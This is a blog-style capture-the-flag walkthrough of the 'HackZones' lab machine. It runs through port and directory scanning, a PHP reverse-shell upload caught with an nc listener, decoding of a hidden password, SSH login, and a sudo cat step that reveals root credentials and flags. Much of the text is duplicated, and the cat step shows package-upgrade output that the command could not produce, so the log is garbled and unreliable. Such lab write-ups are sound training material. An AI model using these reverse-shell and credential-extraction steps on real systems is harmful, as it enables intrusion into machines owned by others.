HACKZONES MACHINE
HACKZONES
┌──(root㉿kali [/home/kali/Descargas/hackzones]
└─# bash auto_deploy.sh hackzones.tar
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
First of all, we have to execute ping and see the connection between attacker machine and vulnerable machine as you can see below.
┌──(kali㉿kali)-[~]
└─$ ping -c3 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.071 ms
--- 172.17.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2048ms
rtt min/avg/max/mdev = 0.039/0.049/0.071/0.015 ms
In addition, we have to execute the command which you can see below.
┌──(kali㉿kali)-[~]
└─$ ping -c3 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.071 ms
--- 172.17.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2048ms
rtt min/avg/max/mdev = 0.039/0.049/0.071/0.015 ms
In addition, we have to execute the command which you can see below.
┌──(root㉿kali)-[/home/kali]
└─# nmap -n -Pn -p- --min-rate 5000 -sV -vvv 172.17.0.2 2>/dev/null
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-01 12:35 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 12:35
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 12:35, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:35
Scanning 172.17.0.2 [65535 ports]
Discovered open port 53/tcp on 172.17.0.2
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 12:35, 0.88s elapsed (65535 total ports)
Initiating Service scan at 12:35
Scanning 3 services on 172.17.0.2
Completed Service scan at 12:35, 6.04s elapsed (3 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 12:35
Completed NSE at 12:35, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 12:35
Completed NSE at 12:35, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000050s latency).
Scanned at 2025-11-01 12:35:32 CET for 7s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
53/tcp open domain syn-ack ttl 64 ISC BIND 9.18.28-0ubuntu0.24.04.1 (Ubuntu Linux)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.58 ((Ubuntu))
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
└─# nmap -n -Pn -p- --min-rate 5000 -sV -vvv 172.17.0.2 2>/dev/null
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-01 12:35 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 12:35
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 12:35, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:35
Scanning 172.17.0.2 [65535 ports]
Discovered open port 53/tcp on 172.17.0.2
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 12:35, 0.88s elapsed (65535 total ports)
Initiating Service scan at 12:35
Scanning 3 services on 172.17.0.2
Completed Service scan at 12:35, 6.04s elapsed (3 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 12:35
Completed NSE at 12:35, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 12:35
Completed NSE at 12:35, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000050s latency).
Scanned at 2025-11-01 12:35:32 CET for 7s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
53/tcp open domain syn-ack ttl 64 ISC BIND 9.18.28-0ubuntu0.24.04.1 (Ubuntu Linux)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.58 ((Ubuntu))
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Now, we can see below this picture.
We have to write in the file: /etc/hosts hackzones.hl and we will obtain this webpage. ┌──(root㉿kali)-[/home/kali]
└─# nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
172.17.0.2 hackzones.hl
Now, let's go to scanning with dirb toolkit to get the information in this webpahe as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# dirb "http://hackzones.hl/"
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 1 12:43:07 2025
URL_BASE: http://hackzones.hl/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://hackzones.hl/ ----
+ http://hackzones.hl/index.html (CODE:200|SIZE:860)
+ http://hackzones.hl/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://hackzones.hl/uploads/
---- Entering directory: http://hackzones.hl/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Nov 1 12:43:09 2025
DOWNLOADED: 4612 - FOUND: 2
Now, we must execute this command which we will give information and interesting paths such as:
└─# nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
172.17.0.2 hackzones.hl
Now, let's go to scanning with dirb toolkit to get the information in this webpahe as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# dirb "http://hackzones.hl/"
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 1 12:43:07 2025
URL_BASE: http://hackzones.hl/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://hackzones.hl/ ----
+ http://hackzones.hl/index.html (CODE:200|SIZE:860)
+ http://hackzones.hl/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://hackzones.hl/uploads/
---- Entering directory: http://hackzones.hl/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Nov 1 12:43:09 2025
DOWNLOADED: 4612 - FOUND: 2
Now, we must execute this command which we will give information and interesting paths such as:
/uploads
/uploads.php
/index.html
/authenticate.php
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u "http://hackzones.hl/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,php,html,bak,exe,xlm
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://hackzones.hl/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php,html,bak,exe,xlm,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 860]
/uploads (Status: 301) [Size: 314] [--> http://hackzones.hl/uploads/]
/upload.php (Status: 200) [Size: 1377]
/dashboard.html (Status: 200) [Size: 5671]
/authenticate.php (Status: 302) [Size: 0] [--> index.html?error=1]
/server-status (Status: 403) [Size: 277]
Progress: 1543899 / 1543899 (100.00%)
===============================================================
Finished
===============================================================
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u "http://hackzones.hl/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,php,html,bak,exe,xlm
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://hackzones.hl/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php,html,bak,exe,xlm,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 860]
/uploads (Status: 301) [Size: 314] [--> http://hackzones.hl/uploads/]
/upload.php (Status: 200) [Size: 1377]
/dashboard.html (Status: 200) [Size: 5671]
/authenticate.php (Status: 302) [Size: 0] [--> index.html?error=1]
/server-status (Status: 403) [Size: 277]
Progress: 1543899 / 1543899 (100.00%)
===============================================================
Finished
===============================================================
Here we can upload a php reverse shell and obtain access to vulnerable machine
as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# sudo nano reverse.php
$ip = '172.17.0.1'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$ip = '172.17.0.1'; // CHANGE THIS
$port = 4444; // CHANGE THIS
Here we can see in the picture below as we have uploaded the reverse shell and then we have to open this file and we will be able to get access to vulnerable machine.
Now, we will obtain reverse shell as you can see below but before we should open port as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvp 4444
listening on [any] 4444 ...
connect to [172.17.0.1] from hackzones.hl [172.17.0.2] 54954
Linux 1bb46ff5f274 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 x86_64 x86_64 GNU/Linux
12:53:12 up 1:46, 0 user, load average: 1.77, 3.43, 2.75
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@1bb46ff5f274:/$ ^Z
zsh: suspended nc -lvp 4444
┌──(root㉿kali)-[/home/kali]
└─# stty raw -echo;fg
[1] + continued nc -lvp 4444
reset xterm
www-data@1bb46ff5f274:/$ export SHELL=BASH
www-data@1bb46ff5f274:/$ export TERM=xterm
www-data@1bb46ff5f274:/$ sudo -l
[sudo] password for www-data:
sudo: a password is required
www-data@1bb46ff5f274:/home$ ls
mrRobot
www-data@1bb46ff5f274:/home$ cd mrRobot/
bash: cd: mrRobot/: Permission denied
www-data@1bb46ff5f274:/home$ cd ..
www-data@1bb46ff5f274:/$ ls
bin etc lib64 proc sbin.usr-is-merged usr
bin.usr-is-merged home media root srv var
boot lib mnt run sys
dev lib.usr-is-merged opt sbin tmp
www-data@1bb46ff5f274:/$ cd /var/www/
www-data@1bb46ff5f274:/var/www$ ls
hackzones.hl html
www-data@1bb46ff5f274:/var/www$ cd html/
www-data@1bb46ff5f274:/var/www/html$ ls
index.html supermegaultrasecretfolder
www-data@1bb46ff5f274:/var/www/html$ cd supermegaultrasecretfolder/
www
└─# nc -lvp 4444
listening on [any] 4444 ...
connect to [172.17.0.1] from hackzones.hl [172.17.0.2] 54954
Linux 1bb46ff5f274 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 x86_64 x86_64 GNU/Linux
12:53:12 up 1:46, 0 user, load average: 1.77, 3.43, 2.75
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@1bb46ff5f274:/$ ^Z
zsh: suspended nc -lvp 4444
┌──(root㉿kali)-[/home/kali]
└─# stty raw -echo;fg
[1] + continued nc -lvp 4444
reset xterm
www-data@1bb46ff5f274:/$ export SHELL=BASH
www-data@1bb46ff5f274:/$ export TERM=xterm
www-data@1bb46ff5f274:/$ sudo -l
[sudo] password for www-data:
sudo: a password is required
www-data@1bb46ff5f274:/home$ ls
mrRobot
www-data@1bb46ff5f274:/home$ cd mrRobot/
bash: cd: mrRobot/: Permission denied
www-data@1bb46ff5f274:/home$ cd ..
www-data@1bb46ff5f274:/$ ls
bin etc lib64 proc sbin.usr-is-merged usr
bin.usr-is-merged home media root srv var
boot lib mnt run sys
dev lib.usr-is-merged opt sbin tmp
www-data@1bb46ff5f274:/$ cd /var/www/
www-data@1bb46ff5f274:/var/www$ ls
hackzones.hl html
www-data@1bb46ff5f274:/var/www$ cd html/
www-data@1bb46ff5f274:/var/www/html$ ls
index.html supermegaultrasecretfolder
www-data@1bb46ff5f274:/var/www/html$ cd supermegaultrasecretfolder/
www
Gotha! we have discovered supermegasecretfolder and there is a contain which is secret.sh we have to look this.
data@1bb46ff5f274:/var/www/html/supermegaultrasecretfolder$ ls
secret.sh
secret.sh
#!/bin/bash
if [ "$(id -u)" -ne 0 ]; then
echo "Este script debe ser ejecutado como root."
exit 1
fi
If we look better, we can see there is a base64 coding, let's go to decoding as you can see in the picture below.
if [ "$(id -u)" -ne 0 ]; then
echo "Este script debe ser ejecutado como root."
exit 1
fi
If we look better, we can see there is a base64 coding, let's go to decoding as you can see in the picture below.
p1=$(echo -e "\x50\x61\x73\x73\x77\x6f\x72\x64")
p2="\x40"
p3="\x24\x24"
p4="\x21\x31\x32\x33"
echo -e "${p1}${p2}${p3}${p4}"
p2="\x40"
p3="\x24\x24"
p4="\x21\x31\x32\x33"
echo -e "${p1}${p2}${p3}${p4}"
www-data@1bb46ff5f274:/var/www/html/supermegaultrasecretfolder$
mrrobot@1bb46ff5f274:/var/www/html/supermegaultrasecretfolder$ whoami
mrrobot
As we have the password we can enter via ssh with the credentials as yoi can see below.
┌──(kali㉿kali)-[~]
└─$ ssh mrrobot@172.17.0.2
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:0QtE5ZPPeBOARzjGfZgv9BmftBFpIUWzmE18XJLidJo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
mrrobot@172.17.0.2's password:
Permission denied, please try again.
mrrobot@172.17.0.2's password:
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.16.8+kali-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
mrrobot@1bb46ff5f274:~$
mrrobot@1bb46ff5f274:~$ sudo -l
Matching Defaults entries for mrrobot on 1bb46ff5f274:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
When we have executed the sudo -l command, we can see that you we can execute /usr/bin/cat as if we were root user as you can see below.
User mrrobot may run the following commands on 1bb46ff5f274:
(ALL : ALL) NOPASSWD: /usr/bin/cat
mrrobot@1bb46ff5f274:~$
Gotha! we have discovered user flag which you can see below.
mrrobot@1bb46ff5f274:~$ cat user.txt
c187e24646744125f041582154a534bb
Now, if we go to gtobins and search cat, we should be able to execute this command and we will convert in root.
mrrobot@1bb46ff5f274:/opt$ sudo -u "root" /usr/bin/cat SistemUpdate
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
libc-bin libc-dev-bin libc6 libc6-dev libc6-i386
5 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 8,238 kB of archives.
After this operation, 1,024 B of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://archive.ubuntu.com/ubuntu focal-updates/main amd64 libc6 amd64 2.31-0ubuntu9.9 [2,737 kB]
Get:2 http://archive.ubuntu.com/ubuntu focal-updates/main amd64 libc-bin amd64 2.31-0ubuntu9.9 [635 kB]
Get:3 http://archive.ubuntu.com/ubuntu focal-updates/main amd64 libc6-dev amd64 2.31-0ubuntu9.9 [2,622 kB]
Get:4 http://archive.ubuntu.com/ubuntu focal-updates/main amd64 libc-dev-bin amd64 2.31-0ubuntu9.9 [189 kB]
Fetched 8,238 kB in 2s (4,119 kB/s)
┌──(kali㉿kali)-[~]
└─$ ssh mrrobot@172.17.0.2
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:0QtE5ZPPeBOARzjGfZgv9BmftBFpIUWzmE18XJLidJo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
mrrobot@172.17.0.2's password:
Permission denied, please try again.
mrrobot@172.17.0.2's password:
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.16.8+kali-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
mrrobot@1bb46ff5f274:~$
mrrobot@1bb46ff5f274:~$ sudo -l
Matching Defaults entries for mrrobot on 1bb46ff5f274:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
When we have executed the sudo -l command, we can see that you we can execute /usr/bin/cat as if we were root user as you can see below.
User mrrobot may run the following commands on 1bb46ff5f274:
(ALL : ALL) NOPASSWD: /usr/bin/cat
mrrobot@1bb46ff5f274:~$
Gotha! we have discovered user flag which you can see below.
mrrobot@1bb46ff5f274:~$ cat user.txt
c187e24646744125f041582154a534bb
Now, if we go to gtobins and search cat, we should be able to execute this command and we will convert in root.
mrrobot@1bb46ff5f274:/opt$ sudo -u "root" /usr/bin/cat SistemUpdate
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
libc-bin libc-dev-bin libc6 libc6-dev libc6-i386
5 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 8,238 kB of archives.
After this operation, 1,024 B of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://archive.ubuntu.com/ubuntu focal-updates/main amd64 libc6 amd64 2.31-0ubuntu9.9 [2,737 kB]
Get:2 http://archive.ubuntu.com/ubuntu focal-updates/main amd64 libc-bin amd64 2.31-0ubuntu9.9 [635 kB]
Get:3 http://archive.ubuntu.com/ubuntu focal-updates/main amd64 libc6-dev amd64 2.31-0ubuntu9.9 [2,622 kB]
Get:4 http://archive.ubuntu.com/ubuntu focal-updates/main amd64 libc-dev-bin amd64 2.31-0ubuntu9.9 [189 kB]
Fetched 8,238 kB in 2s (4,119 kB/s)
Gotha! we have found out the credentials root which are: root (user) password (rooteable).
Extracting user root:rooteable from packages: 50%
Extracting templates from packages: 100%
Preconfiguring packages ...
(Reading database ... 275198 files and directories currently installed.)
Preparing to unpack .../libc6_2.31-0ubuntu9.9_amd64.deb ...
Unpacking libc6:amd64 (2.31-0ubuntu9.9) over (2.31-0ubuntu9.8) ...
Preparing to unpack .../libc-bin_2.31-0ubuntu9.9_amd64.deb ...
Unpacking libc-bin (2.31-0ubuntu9.9) over (2.31-0ubuntu9.8) ...
Preparing to unpack .../libc6-dev_2.31-0ubuntu9.9_amd64.deb ...
Unpacking libc6-dev:amd64 (2.31-0ubuntu9.9) over (2.31-0ubuntu9.8) ...
Preparing to unpack .../libc-dev-bin_2.31-0ubuntu9.9_amd64.deb ...
Unpacking libc-dev-bin (2.31-0ubuntu9.9) over (2.31-0ubuntu9.8) ...
Setting up libc6:amd64 (2.31-0ubuntu9.9) ...
Setting up libc-bin (2.31-0ubuntu9.9) ...
Setting up libc-dev-bin (2.31-0ubuntu9.9) ...
Setting up libc6-dev:amd64 (2.31-0ubuntu9.9) ...
Processing triggers for libc-bin (2.31-0ubuntu9.9) ...
mrrobot@1bb46ff5f274:/opt$
root@1bb46ff5f274:~# ls
TrueRoot.txt root.txt
Don't think it's that easy, keep looking
Gotha! we have just discovered the root flag as you can see below.
Extracting templates from packages: 100%
Preconfiguring packages ...
(Reading database ... 275198 files and directories currently installed.)
Preparing to unpack .../libc6_2.31-0ubuntu9.9_amd64.deb ...
Unpacking libc6:amd64 (2.31-0ubuntu9.9) over (2.31-0ubuntu9.8) ...
Preparing to unpack .../libc-bin_2.31-0ubuntu9.9_amd64.deb ...
Unpacking libc-bin (2.31-0ubuntu9.9) over (2.31-0ubuntu9.8) ...
Preparing to unpack .../libc6-dev_2.31-0ubuntu9.9_amd64.deb ...
Unpacking libc6-dev:amd64 (2.31-0ubuntu9.9) over (2.31-0ubuntu9.8) ...
Preparing to unpack .../libc-dev-bin_2.31-0ubuntu9.9_amd64.deb ...
Unpacking libc-dev-bin (2.31-0ubuntu9.9) over (2.31-0ubuntu9.8) ...
Setting up libc6:amd64 (2.31-0ubuntu9.9) ...
Setting up libc-bin (2.31-0ubuntu9.9) ...
Setting up libc-dev-bin (2.31-0ubuntu9.9) ...
Setting up libc6-dev:amd64 (2.31-0ubuntu9.9) ...
Processing triggers for libc-bin (2.31-0ubuntu9.9) ...
mrrobot@1bb46ff5f274:/opt$
root@1bb46ff5f274:~# ls
TrueRoot.txt root.txt
Don't think it's that easy, keep looking
Gotha! we have just discovered the root flag as you can see below.
root@1bb46ff5f274:~# cat TrueRoot.txt
f034967ad357f8f912740101d3af5e71
root@1bb46ff5f274:~#
f034967ad357f8f912740101d3af5e71
root@1bb46ff5f274:~#
Thank you very much for reading this article
I hope you liked and learned something new
This article has been done with ethical proposes
Good Hack
Comments
Post a Comment